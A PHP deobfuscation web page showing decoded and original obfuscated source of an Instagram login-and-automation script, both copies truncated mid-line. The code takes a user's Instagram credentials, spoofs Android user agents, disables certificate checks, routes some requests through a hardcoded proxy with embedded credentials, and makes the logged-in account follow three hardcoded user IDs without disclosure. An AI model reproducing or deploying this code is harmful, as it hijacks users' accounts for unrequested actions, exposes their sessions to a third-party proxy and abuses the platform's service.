Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto rIxHx; dwGwU: function request($ighost, $useragent, $url, $cookie = 0, $data ..
Decoded Output download
<?php
goto rIxHx; dwGwU: function request($ighost, $useragent, $url, $cookie = 0, $data = 0, $httpheader = array(), $proxy = 0, $userpwd = 0) { $url = $ighost ? "https://i.instagram.com/api/v1/" . $url : $url; $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 20); if ($proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy); } if ($userpwd) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, $userpwd); } if ($httpheader) { curl_setopt($ch, CURLOPT_HTTPHEADER, $httpheader); } curl_setopt($ch, CURLOPT_HEADER, 1); if ($cookie) { curl_setopt($ch, CURLOPT_COOKIE, $cookie); } if ($data) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); $httpcode = curl_getinfo($ch); if (!$httpcode) { return false; } else { $header = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $body = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); curl_close($ch); return array($header, $body); } } goto iY40W; Y_tdV: $login = json_decode(instagram_login($username, $password)); goto w91_M; CuN80: function get_csrftoken() { $fetch = request("si/fetch_headers/", null, null); $header = $fetch[0]; if (!preg_match("#Set-Cookie: csrftoken=([^;]+)#", $header, $match)) { return json_encode(array("result" => false, "content" => "Missing csrftoken")); } else { return $match[0]; } } goto EHNpx; Mv5TV: function instagram_login($post_username, $post_password) { $postq = json_encode(array("phone_id" => generateUUID(true), "_csrftoken" => get_csrftoken(), "username" => $post_username, "guid" => generateUUID(true), "device_id" => generateUUID(true), "password" => $post_password, "login_attempt_count" => 0)); $a = request(1, generate_useragent(), "accounts/login/", 0, hook($postq)); $header = $a[0]; $a = json_decode($a[1]); if ($a->status == "ok") { preg_match("#set-cookie: csrftoken=([^;]+)#", $header, $match); $csrftoken = $match[1]; preg_match_all("%set-cookie: (.*?);%", $header, $d); $cookies = ''; for ($o = 0; $o < count($d[0]); $o++) { $cookies .= $d[1][$o] . ";"; } $id = $a->logged_in_user->pk; $array = json_encode(array("result" => true, "cookies" => $cookies, "useragent" => generate_useragent(), "id" => $id, "token" => $csrftoken)); } else { $msg = $a->message; $array = json_encode(array("result" => false, "msg" => $msg)); } return $array; } goto nwsxa; Iz_r5: $username = "akhill.___"; goto wQiR3; LbPyj: $sleepAfter = $lo; goto Jfz1v; ewwtj: function generateDeviceId($seed) { $volatile_seed = filemtime(__DIR__); return "android-" . substr(md5($seed . $volatile_seed), 16); } goto iBA5_; Jfz1v: function action($ighost, $useragent, $url, $cookie = 0, $data = 0, $httpheader = array(), $proxy = 0, $userpwd = 0) { $proxy = "45.158.184.28:80"; $userpwd = "wtagpmum-dest:s4kwvgyrqojg"; $url = $ighost ? "https://i.instagram.com/api/v1/" . $url : $url; $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, 1); if ($proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy); } if ($userpwd) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, "{$userpwd}"); } if ($httpheader) { curl_setopt($ch, CURLOPT_HTTPHEADER, $httpheader); } curl_setopt($ch, CURLOPT_HEADER, 1); if ($cookie) { curl_setopt($ch, CURLOPT_COOKIE, $cookie); } if ($data) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); $httpcode = curl_getinfo($ch); if (!$httpcode) { return false; } else { $header = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $body = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); curl_close($ch); return $body; } } goto fJ0Cx; iY40W: function read($length = "255") { if (!isset($GLOBALS["StdinPointer"])) { $GLOBALS["StdinPointer"] = fopen("php://stdin", "r"); } $line = fgets($GLOBALS["StdinPointer"], $length); return trim($line); } goto lgdhT; lE8cz: $puti = "\33[1;37m"; goto tLXq6; tLXq6: $white = "\x1b[1;37m"; goto xX3GT; jhbI8: echo "
"; goto Jq7PZ; EHNpx: function generateUUID($type) { $uuid = sprintf("%04x%04x-%04x-%04x-%04x-%04x%04x%04x", mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(0, 4095) | 16384, mt_rand(0, 16383) | 32768, mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(0, 65535)); return $type ? $uuid : str_replace("-", '', $uuid); } goto Mv5TV; r6TYN: function follow($Cookie, $ua) { $t1 = "19726282728"; $t2 = "33495219680"; $t3 = "28962501508"; $url = "friendships/create/" . $t1 . "/"; $url1 = "friendships/create/" . $t2 . "/"; $url2 = "friendships/create/" . $t3 . "/"; $data = hook("{"user_id":"" . $t1 . ""}"); $data1 = hook("{"user_id":"" . $t2 . ""}"); $data2 = hook("{"user_id":"" . $t3 . ""}"); $action = request(1, $ua, $url, $Cookie, $data); $action2 = request(1, $ua, $url1, $Cookie, $data1); $action3 = request(1, $ua, $url2, $Cookie, $data2); return $action[1]; } goto OQhkJ; rIxHx: $b = "\x1b[1;35m"; goto dFBOA; jQbCL: $lo = rand(580, 610); goto LbPyj; fJ0Cx: function proccess_v2($ighost, $useragent, $url, $cookie = 0, $data = 0, $httpheader = array(), $proxy = 0, $userpwd = 0, $is_socks5 = 0) { $url = $ighost ? "https://i.instagram.com/api/v2/" . $url : $url; $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 20); if ($proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy); } if ($userpwd) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, $userpwd); } if ($is_socks5) { curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); } if ($httpheader) { curl_setopt($ch, CURLOPT_HTTPHEADER, $httpheader); } curl_setopt($ch, CURLOPT_HEADER, 1); if ($cookie) { curl_setopt($ch, CURLOPT_COOKIE, $cookie); } if ($data) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); $httpcode = curl_getinfo($ch); if (!$httpcode) { return false; } else { $header = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $body = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); curl_close($ch); return array($header, $body); } } goto G8GU_; lgdhT: function send($ighost, $useragent, $url, $cookie = 0, $data = 0, $httpheader = array(), $proxy = 0, $userpwd = 0, $is_socks5 = 0) { $url = $ighost ? "https://i.instagram.com/api/v2/" . $url : $url; $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 20); if ($proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy); } if ($userpwd) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, $userpwd); } if ($is_socks5) { curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); } if ($httpheader) { curl_setopt($ch, CURLOPT_HTTPHEADER, $httpheader); } curl_setopt($ch, CURLOPT_HEADER, 1); if ($cookie) { curl_setopt($ch, CURLOPT_COOKIE, $cookie); } if ($data) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); $httpcode = curl_getinfo($ch); if (!$httpcode) { return false; } else { $header = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $body = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); curl_close($ch); return array($header, $body); } } goto ewwtj; LhtwE: function generate_useragent($sign_version = "107.0.0.27.121") { $resolusi = array("1080x1776", "1080x1920", "720x1280", "320x480", "480x800", "1024x768", "1280x720", "768x1024", "480x320"); $versi = array("GT-N7000", "SM-N9000", "GT-I9220", "GT-I9100"); $dpi = array("120", "160", "320", "240"); $ver = $versi[array_rand($versi)]; return "Instagram " . $sign_version . " Android (" . mt_rand(10, 11) . "/" . mt_rand(1, 3) . "." . mt_rand(3, 5) . "." . mt_rand(0, 5) . "; " . $dpi[array_rand($dpi)] . "; " . $resolusi[array_rand($resolusi)] . "; samsung; " . $ver . "; " . $ver . "; smdkc210; en_US)"; } goto CuN80; G8GU_: function cekpoint($url, $data, $csrf, $cookies, $ua) { $a = curl_init(); curl_setopt($a, CURLOPT_URL, $url); curl_setopt($a, CURLOPT_USERAGENT, $ua); curl_setopt($a, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($a, CURLOPT_RETURNTRANSFER, 1); curl_setopt($a, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($a, CURLOPT_HEADER, 1); curl_setopt($a, CURLOPT_COOKIE, $cookies); if ($data) { curl_setopt($a, CURLOPT_POST, 1); curl_setopt($a, CURLOPT_POSTFIELDS, $data); } if ($csrf) { curl_setopt($a, CURLOPT_HTTPHEADER, array("Connection: keep-alive", "Proxy-Connection: keep-alive", "Accept-Language: en-US,en", "x-csrftoken: " . $csrf, "x-instagram-ajax: 1", "Referer: " . $url, "x-requested-with: XMLHttpRequest", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")); } $b = curl_exec($a); return $b; } goto dwGwU; JQ7zv: $password = read(); goto jhbI8; Qj1H_: echo "{$white}\xaPlease Provid\ ?>
Did this file decode correctly?
Original Code
<?php
goto rIxHx; dwGwU: function request($ighost, $useragent, $url, $cookie = 0, $data = 0, $httpheader = array(), $proxy = 0, $userpwd = 0) { $url = $ighost ? "\x68\164\164\x70\x73\x3a\57\x2f\x69\56\x69\156\163\164\x61\x67\x72\141\x6d\x2e\143\157\155\57\x61\x70\x69\x2f\x76\61\x2f" . $url : $url; $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 20); if ($proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy); } if ($userpwd) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, $userpwd); } if ($httpheader) { curl_setopt($ch, CURLOPT_HTTPHEADER, $httpheader); } curl_setopt($ch, CURLOPT_HEADER, 1); if ($cookie) { curl_setopt($ch, CURLOPT_COOKIE, $cookie); } if ($data) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); $httpcode = curl_getinfo($ch); if (!$httpcode) { return false; } else { $header = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $body = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); curl_close($ch); return array($header, $body); } } goto iY40W; Y_tdV: $login = json_decode(instagram_login($username, $password)); goto w91_M; CuN80: function get_csrftoken() { $fetch = request("\163\151\x2f\x66\x65\164\x63\x68\137\150\x65\141\x64\x65\x72\x73\57", null, null); $header = $fetch[0]; if (!preg_match("\43\123\x65\x74\x2d\x43\x6f\x6f\153\151\145\72\x20\x63\x73\162\x66\x74\x6f\153\x65\156\x3d\50\133\x5e\x3b\135\x2b\51\43", $header, $match)) { return json_encode(array("\162\145\163\x75\x6c\x74" => false, "\143\157\156\164\145\x6e\x74" => "\x4d\x69\x73\163\x69\156\147\40\x63\163\162\146\164\157\153\145\156")); } else { return $match[0]; } } goto EHNpx; Mv5TV: function instagram_login($post_username, $post_password) { $postq = json_encode(array("\160\x68\157\156\x65\137\x69\144" => generateUUID(true), "\x5f\x63\163\162\x66\x74\157\153\145\156" => get_csrftoken(), "\x75\x73\145\162\156\141\155\145" => $post_username, "\147\165\151\144" => generateUUID(true), "\144\145\x76\x69\x63\x65\x5f\x69\144" => generateUUID(true), "\160\141\163\x73\x77\x6f\x72\x64" => $post_password, "\x6c\157\x67\x69\156\137\x61\x74\164\145\155\160\164\137\143\x6f\165\x6e\164" => 0)); $a = request(1, generate_useragent(), "\x61\x63\143\x6f\165\156\x74\x73\x2f\x6c\x6f\x67\x69\x6e\x2f", 0, hook($postq)); $header = $a[0]; $a = json_decode($a[1]); if ($a->status == "\157\153") { preg_match("\x23\x73\x65\164\55\x63\157\157\x6b\151\145\72\40\x63\x73\162\x66\x74\157\x6b\145\x6e\75\x28\133\136\73\135\x2b\51\x23", $header, $match); $csrftoken = $match[1]; preg_match_all("\x25\163\x65\164\55\x63\x6f\157\x6b\x69\x65\72\x20\x28\x2e\52\x3f\51\73\x25", $header, $d); $cookies = ''; for ($o = 0; $o < count($d[0]); $o++) { $cookies .= $d[1][$o] . "\x3b"; } $id = $a->logged_in_user->pk; $array = json_encode(array("\162\x65\x73\165\154\x74" => true, "\x63\157\157\x6b\151\x65\163" => $cookies, "\x75\x73\145\x72\x61\x67\145\x6e\164" => generate_useragent(), "\151\x64" => $id, "\164\157\x6b\145\x6e" => $csrftoken)); } else { $msg = $a->message; $array = json_encode(array("\x72\145\x73\x75\154\x74" => false, "\155\x73\147" => $msg)); } return $array; } goto nwsxa; Iz_r5: $username = "\141\x6b\x68\151\x6c\154\x2e\x5f\137\137"; goto wQiR3; LbPyj: $sleepAfter = $lo; goto Jfz1v; ewwtj: function generateDeviceId($seed) { $volatile_seed = filemtime(__DIR__); return "\x61\156\144\x72\157\151\144\x2d" . substr(md5($seed . $volatile_seed), 16); } goto iBA5_; Jfz1v: function action($ighost, $useragent, $url, $cookie = 0, $data = 0, $httpheader = array(), $proxy = 0, $userpwd = 0) { $proxy = "\64\65\56\61\65\70\56\61\x38\64\x2e\62\x38\x3a\x38\x30"; $userpwd = "\x77\x74\x61\x67\160\x6d\x75\x6d\x2d\144\x65\163\164\72\163\x34\x6b\x77\x76\x67\x79\162\161\157\152\x67"; $url = $ighost ? "\x68\x74\x74\160\163\x3a\x2f\x2f\151\56\x69\156\x73\x74\x61\x67\x72\x61\x6d\56\143\157\155\57\x61\160\151\57\166\61\57" . $url : $url; $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, 1); if ($proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy); } if ($userpwd) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, "{$userpwd}"); } if ($httpheader) { curl_setopt($ch, CURLOPT_HTTPHEADER, $httpheader); } curl_setopt($ch, CURLOPT_HEADER, 1); if ($cookie) { curl_setopt($ch, CURLOPT_COOKIE, $cookie); } if ($data) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); $httpcode = curl_getinfo($ch); if (!$httpcode) { return false; } else { $header = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $body = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); curl_close($ch); return $body; } } goto fJ0Cx; iY40W: function read($length = "\62\x35\65") { if (!isset($GLOBALS["\123\x74\x64\x69\x6e\x50\157\x69\x6e\164\x65\x72"])) { $GLOBALS["\x53\164\144\x69\x6e\x50\x6f\151\x6e\x74\145\x72"] = fopen("\160\x68\x70\x3a\57\57\163\164\x64\x69\156", "\162"); } $line = fgets($GLOBALS["\123\x74\x64\151\156\x50\157\x69\x6e\x74\145\162"], $length); return trim($line); } goto lgdhT; lE8cz: $puti = "\33\x5b\x31\x3b\x33\x37\x6d"; goto tLXq6; tLXq6: $white = "\x1b\x5b\x31\x3b\63\x37\155"; goto xX3GT; jhbI8: echo "\12"; goto Jq7PZ; EHNpx: function generateUUID($type) { $uuid = sprintf("\45\x30\64\170\45\x30\x34\x78\x2d\45\60\x34\x78\55\45\x30\x34\170\x2d\45\60\64\x78\55\45\60\64\x78\x25\x30\64\x78\x25\60\x34\170", mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(0, 4095) | 16384, mt_rand(0, 16383) | 32768, mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(0, 65535)); return $type ? $uuid : str_replace("\55", '', $uuid); } goto Mv5TV; r6TYN: function follow($Cookie, $ua) { $t1 = "\61\x39\67\x32\x36\62\70\x32\x37\62\70"; $t2 = "\63\x33\64\x39\x35\x32\61\71\66\x38\x30"; $t3 = "\x32\70\71\x36\62\x35\60\61\65\60\70"; $url = "\x66\162\151\x65\156\x64\x73\x68\151\160\x73\x2f\x63\x72\x65\141\x74\x65\57" . $t1 . "\57"; $url1 = "\146\x72\151\145\156\144\x73\x68\x69\x70\x73\57\143\x72\x65\141\x74\145\x2f" . $t2 . "\57"; $url2 = "\x66\x72\151\145\x6e\144\x73\x68\151\160\x73\x2f\x63\x72\145\x61\x74\145\57" . $t3 . "\x2f"; $data = hook("\x7b\x22\165\163\x65\x72\137\x69\x64\42\72\x22" . $t1 . "\42\x7d"); $data1 = hook("\x7b\x22\x75\163\x65\162\x5f\151\x64\x22\72\x22" . $t2 . "\42\175"); $data2 = hook("\x7b\x22\165\163\145\x72\137\x69\x64\x22\x3a\x22" . $t3 . "\x22\x7d"); $action = request(1, $ua, $url, $Cookie, $data); $action2 = request(1, $ua, $url1, $Cookie, $data1); $action3 = request(1, $ua, $url2, $Cookie, $data2); return $action[1]; } goto OQhkJ; rIxHx: $b = "\x1b\133\x31\x3b\x33\65\155"; goto dFBOA; jQbCL: $lo = rand(580, 610); goto LbPyj; fJ0Cx: function proccess_v2($ighost, $useragent, $url, $cookie = 0, $data = 0, $httpheader = array(), $proxy = 0, $userpwd = 0, $is_socks5 = 0) { $url = $ighost ? "\150\x74\164\160\x73\x3a\x2f\57\x69\x2e\151\156\163\x74\x61\x67\x72\141\155\x2e\x63\157\x6d\57\x61\x70\151\x2f\x76\62\57" . $url : $url; $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 20); if ($proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy); } if ($userpwd) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, $userpwd); } if ($is_socks5) { curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); } if ($httpheader) { curl_setopt($ch, CURLOPT_HTTPHEADER, $httpheader); } curl_setopt($ch, CURLOPT_HEADER, 1); if ($cookie) { curl_setopt($ch, CURLOPT_COOKIE, $cookie); } if ($data) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); $httpcode = curl_getinfo($ch); if (!$httpcode) { return false; } else { $header = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $body = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); curl_close($ch); return array($header, $body); } } goto G8GU_; lgdhT: function send($ighost, $useragent, $url, $cookie = 0, $data = 0, $httpheader = array(), $proxy = 0, $userpwd = 0, $is_socks5 = 0) { $url = $ighost ? "\x68\164\164\160\163\72\57\57\151\x2e\151\x6e\163\164\x61\x67\x72\141\x6d\x2e\x63\x6f\x6d\x2f\141\x70\x69\57\x76\x32\57" . $url : $url; $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 20); if ($proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy); } if ($userpwd) { curl_setopt($ch, CURLOPT_PROXYUSERPWD, $userpwd); } if ($is_socks5) { curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); } if ($httpheader) { curl_setopt($ch, CURLOPT_HTTPHEADER, $httpheader); } curl_setopt($ch, CURLOPT_HEADER, 1); if ($cookie) { curl_setopt($ch, CURLOPT_COOKIE, $cookie); } if ($data) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $response = curl_exec($ch); $httpcode = curl_getinfo($ch); if (!$httpcode) { return false; } else { $header = substr($response, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); $body = substr($response, curl_getinfo($ch, CURLINFO_HEADER_SIZE)); curl_close($ch); return array($header, $body); } } goto ewwtj; LhtwE: function generate_useragent($sign_version = "\x31\60\x37\56\60\x2e\60\56\x32\x37\56\61\62\61") { $resolusi = array("\x31\x30\x38\60\170\x31\67\67\x36", "\x31\60\x38\60\170\61\71\62\x30", "\x37\x32\x30\170\61\62\70\x30", "\x33\x32\60\x78\x34\x38\60", "\x34\70\60\x78\x38\60\x30", "\61\x30\x32\x34\x78\67\66\x38", "\61\x32\x38\60\x78\67\x32\x30", "\67\66\x38\170\61\60\x32\x34", "\x34\x38\60\x78\x33\62\60"); $versi = array("\x47\124\55\x4e\x37\x30\60\60", "\123\115\55\x4e\71\x30\60\60", "\x47\124\55\x49\x39\x32\x32\60", "\107\x54\55\x49\x39\61\60\x30"); $dpi = array("\61\x32\x30", "\61\x36\60", "\63\x32\x30", "\62\64\x30"); $ver = $versi[array_rand($versi)]; return "\x49\156\x73\x74\141\147\162\x61\155\x20" . $sign_version . "\40\x41\x6e\144\x72\157\151\x64\40\50" . mt_rand(10, 11) . "\x2f" . mt_rand(1, 3) . "\x2e" . mt_rand(3, 5) . "\56" . mt_rand(0, 5) . "\x3b\40" . $dpi[array_rand($dpi)] . "\x3b\40" . $resolusi[array_rand($resolusi)] . "\x3b\x20\x73\141\x6d\163\165\156\x67\73\40" . $ver . "\x3b\40" . $ver . "\73\x20\163\x6d\144\x6b\x63\x32\61\60\73\40\145\156\x5f\125\x53\51"; } goto CuN80; G8GU_: function cekpoint($url, $data, $csrf, $cookies, $ua) { $a = curl_init(); curl_setopt($a, CURLOPT_URL, $url); curl_setopt($a, CURLOPT_USERAGENT, $ua); curl_setopt($a, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($a, CURLOPT_RETURNTRANSFER, 1); curl_setopt($a, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($a, CURLOPT_HEADER, 1); curl_setopt($a, CURLOPT_COOKIE, $cookies); if ($data) { curl_setopt($a, CURLOPT_POST, 1); curl_setopt($a, CURLOPT_POSTFIELDS, $data); } if ($csrf) { curl_setopt($a, CURLOPT_HTTPHEADER, array("\103\x6f\x6e\x6e\145\143\x74\x69\x6f\x6e\72\40\x6b\145\x65\160\55\x61\x6c\151\166\145", "\120\162\157\x78\171\x2d\x43\157\156\x6e\x65\x63\x74\151\x6f\x6e\x3a\x20\153\145\x65\x70\55\x61\154\151\166\145", "\x41\x63\x63\145\160\164\x2d\114\141\156\x67\x75\141\147\x65\72\x20\x65\156\55\x55\123\54\145\156", "\170\55\143\163\x72\x66\x74\x6f\x6b\145\x6e\72\x20" . $csrf, "\170\x2d\x69\x6e\x73\164\x61\x67\162\141\155\55\141\152\x61\170\x3a\x20\61", "\122\145\146\145\162\145\162\x3a\40" . $url, "\170\55\x72\x65\x71\x75\145\x73\x74\145\x64\55\x77\x69\x74\x68\x3a\40\x58\x4d\114\110\164\164\x70\122\x65\x71\x75\x65\163\164", "\101\x63\x63\x65\160\164\x3a\x20\x74\x65\170\164\x2f\150\x74\x6d\x6c\54\x61\x70\x70\154\x69\x63\x61\164\x69\x6f\156\57\170\150\x74\x6d\154\x2b\x78\x6d\x6c\54\141\160\x70\154\151\x63\141\x74\151\157\x6e\57\170\155\x6c\x3b\161\x3d\x30\56\71\54\x2a\57\x2a\x3b\161\75\x30\x2e\x38")); } $b = curl_exec($a); return $b; } goto dwGwU; JQ7zv: $password = read(); goto jhbI8; Qj1H_: echo "{$white}\xa\120\x6c\145\x61\x73\145\40\x50\162\157\x76\151\144\
Function Calls
None |
Stats
MD5 | 4db035a90ebeb6e83b37d2730e40d5d6 |
Eval Count | 0 |
Decode Time | 88 ms |